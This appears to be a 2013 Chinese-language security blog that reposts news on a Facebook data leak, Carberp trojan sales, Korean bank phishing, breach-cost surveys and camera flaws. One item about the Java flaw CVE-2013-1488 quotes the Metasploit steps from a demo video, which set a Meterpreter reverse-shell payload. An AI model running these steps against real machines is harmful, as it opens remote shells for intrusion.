本課程將會利用淺顯易懂的教學,讓一般使用者與網站開發者了解 Web Security 的重要。透過對攻擊手法的了解以及對網站的實際模擬測試,學習修補其中的弱點,達到網站安全的基本需求。


轉載自《Youtube》

Facebook 也出包!安全漏洞導致 600 萬使用者個資外洩

Facebook 也出包!安全漏洞導致 600 萬使用者個資外洩

Facebook 安全團隊今日表示發現一項安全漏洞,Download Your Information(DYI)工具會無意導致使用者的 email 或手機號碼洩漏給其他使用者。目前已有 600 萬使用者帳號個資恐遭外洩。

94a4843c12f9c17e81ca9773acd5f72bFacebook 安全團隊在官方部落格表示,他們發現 Facebook 一項安全漏洞可能會導致使用者帳號的 email 或手機號碼洩漏給其他使用者,目前已有 600 萬使用者個資恐遭外洩。

漏洞發生的原因,是當使用者從聯絡人名單(contact lists)或地址簿(address books)上傳到 Facebook 時,Facebook 便會從其他使用者的聯絡人訊息進行比對,加以找出使用者之間的關聯、並進行推薦。這也就是為什麼 Facebook 總是有辦法推薦我們可能認識的朋友。但因為漏洞,部分資訊包含交友建議(friend recommendation)、以及減少 Facebook 邀請數量的訊息,會在無意中被記錄下來。如果使用者帳戶下載了 Download Your Information(DYI)工具,下載了他們的 Facebook 使用者帳戶訊息,即可看到其他聯絡人、或曾經聯絡過的人的 email 或手機電話號碼。



▲Facebook 表示 Download Your Information(DYI)工具會無意透露使用者的 email 或手機號碼。目前 Facebook 安全團隊已修改這項漏洞。

這項漏洞在去年已出現,直到在上週才被發現。Facebook 收到通知之後,已在 24 小時內修補漏洞,但恐怕已有 600 萬使用者帳號的個資已透過 Download Your Information(DYI)工具下載外露,此外還有一些非 Facebook 使用者帳戶的 email 及手機號碼。不過 Facebook 也強調,這些 email 或手機號碼的下載資訊都只被下載1~2次,因此多數情況下只會洩漏給一個人;另外其他個人訊息等敏感內容也不會在下載資訊中。最後只有 Facebook 使用者能使用 Download Your Information(DYI)工具,開發者和廣告商無法取得內容。

Facebook 表示目前尚無證據這項漏洞以被不肖人士使用,也尚未收到使用者投訴或出現異常不法行為,Facebook 以通知美國、加拿大、歐洲的監管機構,並會透過 email 通知個資外洩的使用者帳戶。Facebook 也表示,沒有任何公司可以保證 100% 不會出現漏洞。

資料來源:TechCrunch
轉載自《T客邦》

2013年6月20日 星期四

Carberp木馬原始碼網路超低價開賣 恐引起金融惡意程式泛濫

Carberp木馬原始碼網路超低價開賣 恐引起金融惡意程式泛濫

根據俄羅斯網路犯罪調查公司Group-IB的研究人員指出,Carberp金融木馬程式的原始碼,以任何有心人能付得起的超低廉價格,在網路地下黑市開賣;如此一來,在不久的未來,將導致以Carberp為基礎之額外金融惡意程式的泛濫開發出現。


Group-IB國際專案負責人Andrey Komarov於週二透過電子郵件表示,某位被認為是Carberp網路犯罪組織的成員,在地下論壇宣佈有意以美金5,000元的價碼,出售木馬程式與其額外元件的原始碼。

這真的是非常低廉的價格,因為光就今年初,Carberp網路犯罪組織就曾在網路上以高達4萬美元的價格,出售可被用來開發產生出客製化木馬程式的產生器。同時,接單式編譯(Compiled-to-order)之惡意程式變種,會以每月收費的模式來提供,其月費價格範圍約在2,000美元到10,000美元之間,全視所包含額外元件的數量而定。

Komarov預估,光就木馬本身的原始碼(不包含額外元件),就值50,000美元到70,000美元之間的價碼。

Carberp一開始是以私人、非賣品,且僅供單一網路犯罪組織開發與使用木馬程式的宗旨而於2010年成立。但隨著2011年開始限量出售生成器之後,運用該組織「出品」之木馬程式,而展開之網路詐欺攻擊行動的數量遂開始倍增。

長久以來,木馬程式似乎一直專門用來鎖定攻擊包括俄羅斯、烏克蘭、白俄羅斯、哈薩克、摩爾多瓦(Moldova)及其他前蘇聯附庸國等地的網路銀行用戶。然而,今年開始出現以美國與澳洲銀行為攻擊目標的變種。

資料來源:PCWorld
轉載自《網路資訊雜誌》

網站SEO優化案例研究 (二):你應該知道的負面SEO

網站SEO優化案例研究 (二):你應該知道的負面SEO

許多企業可能連正面SEO都做得忙不過來了,根本不可能去管負面SEO (Negative SEO)。但是這兩者是操作SEO很重要的項目,因為只要你有競爭對手,就可能會有人在默默的幫你做負面SEO ...

我們在"什麼是Negative SEO? 網站應該如何預防?"說過,大網站就如同大的戰艦或是航空母艦一樣,可以承受較大的風浪,而小的網站就好像小艇一般,如果沒有注意就很容易滅頂,因此越小的中小企業越必須注意負面SEO的影響。

競爭對手會怎麼幫你做負面SEO呢? 大多是幫你建立低品質的大量連結,例如在許多網站留言,幫你建立大量的連結,連到你的網站 (如下圖)。雖然有些留言垃圾大多是SEO公司替客戶做的,但是也有為數不少的留言垃圾是屬於負面SEO。



或是在許多被搜尋引擎降級的情色網站,建立大量連結 (如下圖)。



從這些廣告中去看原始碼,就能看到一些意想不到的連結 (如下圖)。我們的網站也被加到這些廣告中,另外還有國家發展研究所,以及義大利經濟貿易文化推廣辦事處也都是受害者。



並且經追查結果,我們的網頁被這個網站加在542頁的廣告當中,國家發展研究所被加在145頁廣告當中,義大利經濟貿易文化推廣辦事處也是145頁。而且受害者不只有這幾個,還包括各界大中小型的企業或是機關網站。

許多網站可能根本不知道,自己的網站已經被加到低品質的頁面當中,變成負面SEO的受害者。

這類連結可能是惡意的負面SEO,也可能是隨機的,因為這些網頁可能想用outbound link效果來欺騙搜尋引擎。但是不管用意為何,都是會造成傷害的負面SEO。

可以不管這些連結嗎? 這些連結真的會造成SEO的負面影響嗎? 就如前面說的,如果你是小網站,更應該注意這些負面SEO,因為本來搜尋引擎就已經不是很相信你的網站了,如果再把這些負面連結算到你的頭上,那真的是永不得超生了。

因此你必須了解你的網站連結狀況,例如使用Google的link指令,或是使用工具AhrefsMajestic SEOOpen Site Explorer,都可以知道有哪些連結連到你的網站。當發現有不當連結並且無法要求對方移除時,除了通知Google之外,也只能使用Google的Disavow Links Tool了。

當然負面SEO也不是只有競爭對手會幫你做,有時候很多搞不清楚狀況的SEO操作者,也會自己去做負面SEO,以為是在做正面SEO,但是其實是越做越糟糕。

現在的SEO已經越來越複雜了,不僅要自己顧好自己網站的SEO,除了不要無意間自己做了錯誤的SEO操作之外,還要費心去注意是不是會遭受到競爭對手的負面SEO攻擊。

轉載自《台灣搜尋引擎優化與行銷研究院》

數家韓國網銀出現網路釣魚網站

數家韓國網銀出現網路釣魚網站

網路銀行的相關威脅已經流行了好幾年,不過最近它們似乎下定決心要擴大目標範圍。在過去幾個禮拜、幾個月內,趨勢科技看到利用各類技術的多種攻擊將目標放在韓國銀行。

我們所看到的最新一次攻擊,會使用木馬程式將幾家韓國銀行使用者導向到惡意的網路釣魚(Phishing)網站。它通過修改系統的HOSTS檔案來做到這一點,好將使用者導到位在日本的一個IP地址。這起攻擊所用的木馬程式為TSPY_QHOST.QFB,而相關的批次檔(實際用來修改HOSTS檔案的程式)被偵測為BAT_QHOST.QFB。(這種技術已經被其他的銀行威脅使用多年了)

惡意網站看起來像這樣:


圖一、惡意網站網頁

惡意網站在中間會多出一個視窗。


圖二、惡意網站多出的視窗

圖片大致翻譯如下:

您有在電腦上安裝安全憑證嗎?
您有使用安全晶片卡來做身分識別嗎?
如果您取得這個安全憑證,您就可以安心地使用友利網路銀行。
點擊以下按鈕,您將會移動到安全驗證網頁。
開始日期:預計在八月到九月。

不知情的使用者可能會相信自己確實需要執行此驗證動作,從而按下按鈕。一開始,使用者會被導到下面這個會詢問他們名字和韓國居民身份證號碼的網頁:


圖三、要求資訊

下面的畫面要求更多資訊,像是手機號碼、帳戶號碼、帳戶密碼、使用者帳號、使用者密碼和憑證密碼:


圖四、要求更多的資訊

這些釣魚網站利用了使用者對他們銀行的信任,來獲取使用者金融和個人資訊。使用者以為自己是將資料輸入到真正的銀行網站,但其實並不是。相反地,這些資訊最後落到了創造這惡意軟體的攻擊者手中。(趨勢科技可以偵測這釣魚網站和相關的惡意軟體)。

雖然這次攻擊看起來在目標選擇上有些變化,但所用的惡意軟體還是比不上其他地方所使用的那樣複雜。另外,最近也已經看過許多次銀行威脅利用各種手法來竊取韓國使用者資料。

我們去年在犯罪軟體報告裡提到過銀行威脅。但是在未來,還是有可能會看更加複雜的威脅攻擊這些銀行。

原文出處:Malware Redirects South Korean Users To Phishing Sites
轉載自《雲端運算與網路安全趨勢部落格》

新 Oracle Java Applet Driver Manager 漏洞大爆發 (含影片示範)

新 Oracle Java Applet Driver Manager 漏洞大爆發 (含影片示範)

上一個 JSE 漏洞還沒解決,沒隔幾天又被挖出來 Java Applet 漏洞,原本各媒體又要大酸特酸,這家公司到底爛到何種程度,還好在大家開罵之前,Oracle 提前於 2013/6/18 發佈總計40多個修正程式,來杜悠悠之口。

Oracle官方網站說明:
https://blogs.oracle.com/security/entry/june_2013_critical_patch_update

解決方案:
請盡速更新 『火燙燙新版』各作業系統伺服器端與使用者端的修正程式,畢竟相關攻擊工具在網路上都已經提前於修補程式先釋出了。

漏洞發佈日期:
由 2013 Pwn2Own 首發,2013/6/7(發佈概念驗證程式 PoC)

漏洞編號:
CVE-2013-1488
OSVDB-91472
BID-58504
ZDI-13-076

影響的 Java 版本:
JSE 7 Update 17 (含之前的版本)

影片內指令:
use exploit/multi/browser/java_jre17_driver_manager
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit
getuid
sysinfo

參考資料來源:
http://eromang.zataz.com/2013/06/19/cve-2013-1488-oracle-java-applet-driver-manager-vulnerability-metasploit-demo/


轉載自《網路攻防戰》

2013年6月19日 星期三

無線網路人口倍數成長 下載App以遊戲社交為主,安全意識仍不足

無線網路人口倍數成長 下載App以遊戲社交為主,安全意識仍不足

隨著智慧手機的普及,台灣無線及行動網路使用者在過去一年比起前幾年,呈現倍數成長的趨勢。TWNIC台灣網路資訊中心日前公佈「2012年台灣無線網路使用調查」報告,報告中指出全台12歲以上半年內曾使用無線網路(包括行動上網)的人口達976萬人,相較去年同期成長11.9%,與往年相比成長超過3倍。然而哪裡有人潮、哪裡就有威脅。趨勢科技調查,現在約12%的Android行動應用程式可能是惡意程式。

TWNIC指出,調查顯示有67.95%的無線網民在使用上感到困擾,主要原因包括線路不穩連線品質不佳、下載速度太慢等。行政院科技會報副執行秘書黃彥男指出,WiFi扮演著分流的角色,讓寬頻更快,此外明年底NCC釋出更多頻譜時,業者可透過LTE技術讓寬頻更好,到時候也會有更多App的開發。

報告中也指出分別有近4成與4成6的無線/行動網民會擔心網路安全問題。然而趨勢科技總經理洪偉淦認為,網民仍停留在擔心的心理層次還未化為行動,許多人對於智慧手機安全防護意識仍不夠。根據TWNIC調查統計,目前在曾經下載App的使用者中,約2成曾付費下載,並且仍以遊戲、社交類型的軟體為主,其次是翻譯等工具類軟體。

值得注意的是,日前高雄市刑大才逮捕一名販售手機監控程式的嫌犯,該監控程式可植入市面上任一款智慧手機,不到一分鐘快速安裝後即自動隱藏,可進行通話監聽、環境監聽、簡訊複製、GPS定位、視訊監控等。此外,趨勢科技也指出一支在Google Play上被下載超過10萬次的”Spy Phone Pro”的間諜程式,也有類似效果,一旦安裝該應用程式於特定目標手機後,便可透過網頁追蹤受害者手機位置、電話與簡訊。使用者應提高警覺。


監控手機通話與位址的惡意App已被下載超過10萬次。(圖片來源:趨勢科技提供)

轉載自《資安人科技網》

賽門鐵克:64%企業資料外洩是人為疏失、系統故障造成

賽門鐵克:64%企業資料外洩是人為疏失、系統故障造成

賽門鐵克調查美國、英國、日本、澳洲等9個國家企業資料外洩原因,發現高達6成4的外洩事件與員工行為不當、系統故障有關,顯示加強員工訓練、系統防護為防範資料外洩良方,其餘3成7外洩為遭受外部攻擊。 

賽門鐵克發佈資安調查報告,指企業發生資料外洩原因有高達3分之2是人為疏失或系統出錯造成,每筆資料外洩企業所負擔平均成本增加至136美元。

該份調查是以2012年的9個國家,包括美國、義大利、日本、澳洲、巴西、法國、德國、印度共227家企業所發生的企業資料外洩事件為調查對象,排除10萬筆以上大量資料外洩所做的統計。

調查發現企業資料外洩主因是員工不當處理資料、缺乏系統控管,或是違反產業或政府規範,其中64%是因為員工疏失或系統出錯所造成。每筆資料外洩的平均成本提高到136美元,不同產業面臨的成本也高低不同,醫療、金融、製藥等高度資安規範的產業,成本比其他產業高出7成。

儘管從全球角度來看,每筆資料外洩成本攀升,但報告指出美國企業所面臨的發生資料外洩整體成本卻是略為下降到540萬美元,原因與美國企業普遍設置資安長(Chief Information Security Officer,CISO)有關,並建立較完備的資安事件應變計劃、防護措施。

因企業在每個國家法律、面對的資安威脅不同,不同國家的企業所面臨的資料外洩成本也不同。例如在德國、澳洲、英國、美國等對消費者保護較完善的地區,企業資料外洩成本明顯較高,美國每筆資料外洩平均成本為188美元,德國為199美元,均高於平均值。

賽門鐵克建議企業加強員工資料使用的教育訓練,並採取技術保護資料,例如資料加密、身份識別,另外,也應擬妥資料外洩計劃及良好的通知客戶程序,儘量降低資安事件衝擊。

轉載自《iThome》

維護民眾個資 房仲業將訂資安計畫

維護民眾個資 房仲業將訂資安計畫

為保障個資安全,內政部將針對不動產業者制定法條。內政部地政司科長陳啟明指出,各房仲業者應於即日起的3個月內,訂定個資安全維護計畫,並送至地方政府備查,以落實維護民眾個資安全,而未依規定訂定計畫,屆期未改正者最高可罰新臺幣20萬元。房仲業者表示,房仲業一直有針對個資方面做保護,現在只是政府機關多做一個備查的動作。



台灣房屋智庫執行長劉怡蓉表示,房仲這邊會依法配合,而其實一般民眾在看房屋還未買屋的時候,雙方就會先簽A4大小的個資保密同意書,簽完之後,才會取得到消費者的個資,除非消費者拒絕不願意提供;其實長久以來房仲業都已經有針對個資方面做保護,現在只是政府機關多做一個備查的動作。

有鑑於不動產經紀業為經營業務需要,經常蒐集大量的個人資料,若有不當利用或未妥善維護,恐對民眾造成傷害。因此內政部依個人資料保護法第27條第3項之授權,訂定「不動產經紀業個人資料檔案安全維護管理辦法」,指定不動產經紀業應訂定個人資料檔案安全維護計畫,以落實維護民眾個人資料之安全。

陳啟明指出,依該辦法,不動產經紀業於訂定計畫時,得視其營業規模、特性、個人資料之性質及數量等事項,訂定適當之安全維護管理措施。該管理措施重點包括個人資料蒐集、處理及利用之內部管理程序,設備安全管理、資料安全管理及人員管理措施,以及員工教育宣導等內容。

內政部提醒不動產經紀業,該辦法將於近期發布施行,並於發佈後3個月內將計畫報請直轄市、縣(市)政府備查,對於未訂定計畫之業者,將由直轄市、縣(市)政府依個人資料保護法第48條規定限期改正,屆期未改正者,按次處新臺幣2萬元以上、20萬元以下罰鍰。

圖說:內政部通過「不動產經紀業個人資料檔案安全維護管理辦法」,規範經紀業應訂定個人資料檔案安全維護計畫,以期對經紀業使用的個人資料能有所保護。

轉載自《Yahoo新聞》

數十萬支監控攝影機潛藏被駭漏洞 電影情景恐真實上演

數十萬支監控攝影機潛藏被駭漏洞 電影情景恐真實上演

美國安全專家表示,確認出可遠端入侵專門用於工業廠房、監獄、銀行與軍事重地之高階監控攝影機的攻擊方法,如此一來,將會導致駭客監控各類設施,抑或獲得存取敏感電腦網路權限的潛在風險發生。

前美國國家安全局(National Security Administration, NSA)軟體開發人員,現任職於某私人安全公司的Craig Heffner指出,他發現當前包括思科(Cisco)、友訊(D-Link)與趨網(TRENDnet)旗下數位影像監控設備中,存在從未被揭露過的安全漏洞。

「這是個重大威脅,」他在受訪中表示:「因為有心人可偷偷地存取攝影機並瀏覽內容,抑或將其做為入侵網路並發動內部系統攻擊的跳板及立足點。」

他打算在7月31日於拉斯維加斯(Las Vegas)舉辦的黑帽駭客大會中,展示如何操作上述安全漏洞的入侵技術。

目前擔任馬里蘭州哥倫比亞市Tactical Network Solution公司弱點研究人員的Heffner指出,其已發現有高達數十萬支監控攝影機可以透過公共網際網路來存取。

他同時想出如何讓好萊塢動作片中,常見入侵攻擊手法之現實生活版成行的方法。因為他可以透過凍結監控攝影機的畫面,來協助盜賊在不會被偵測的情況下入侵關鍵設備。

Heffner表示,針對上述安全研究,他尚未與監控設備製造商進行討論,同時在駭客大會展示之前,他也不打算這麼做。

思科、友訊及趨網表示,在黑客大會之後,他們會採取任何讓其監控設備更加安全的適當措施。

圖片/資料來源:Reuters
轉載自《網路資訊雜誌》

報告:資料外洩事件頻傳 外部攻擊的代價高於內部疏失

報告:資料外洩事件頻傳 外部攻擊的代價高於內部疏失

安全廠商賽門鐵克與隱私暨資訊管理研究機構Ponemon Institute共同發表2013年全球資料外洩成本調查報告,其中指出駭客攻擊所造成的資料外洩成本較人為疏失或是系統故障來得高。此外,相較去年,資料外洩成本每筆提高至136美元。

此一調查報告中顯示兩大資料外洩的主要現象,分別為每筆資料外洩成本較去年上升,以及惡意程式和網路攻擊所造成的資料外洩成本最高。

全球資料外洩成本升高 美國卻不升反降

以整體情況來看,單筆使用者資料外洩成本較去年來得高,上升至136美元,而所謂「單筆資料成本」是指,企業組織針對每筆外洩資料付出的直接或間接費用之平均成本。然而,較為特別的是,美國每起資料外洩事件的整體成本卻呈現微幅下降,之所以如此,主要原因為美國企業普遍設有資訊安全長一職(Chief Information Security Officer, CISO),且有較為完整的資料外洩應變計畫,可以降低損失成本。

報告中並同樣指出,設有完善應變計畫的企業,其外洩成本相較沒有設立的企業,可以減少約20%,而若以產業而言,醫療、金融及製藥等受到高度嚴格規範的產業,其資料外洩的成本較其他產業高出7成。

另外,資料外洩成本也會受到企業所在地區之不同而有很大的差異。諸如德國、澳洲、英國與美國等規範較為嚴謹的國家,相對當然資料外洩成本也會跟著提高;其中美國與德國一直以來都並列資料外洩成本最高的國家,兩者單筆外洩資料的平均成本分別為188美元以及199美元,其單起資料外洩事件整體成本也為最高的兩個國家。


▲單筆使用者資料外洩成本從去年的130美元上升至今年的136美元。

駭客攻擊佔比相對低 資料外洩成本則較高

雖然相較於人為疏失與系統故障,起因於惡意程式以及網路攻擊的資料外洩事件比例較少,大約只佔37%,然而卻是成本最高的資料外洩事件成因。以美國和德國為例,此一原因導致的單筆資料外洩成本平均為277美元與214美元;相對地,開發中國家的巴西和印度則較低,每筆資料外洩的成本分別僅需要付出71美元及46美元,差異最多高達6倍之多。

賽門鐵克並建議,企業可以至官方所提供的資料外洩成本分析網站,估算每筆外洩資料的大致成本,以及企業主要面臨何種資安風險。


▲雖然駭客攻擊導致的資料外洩事件僅佔1/3,但所需付出的資料外洩成本卻是相對最高的。

圖片/資料來源:賽門鐵克
轉載自《網路資訊雜誌》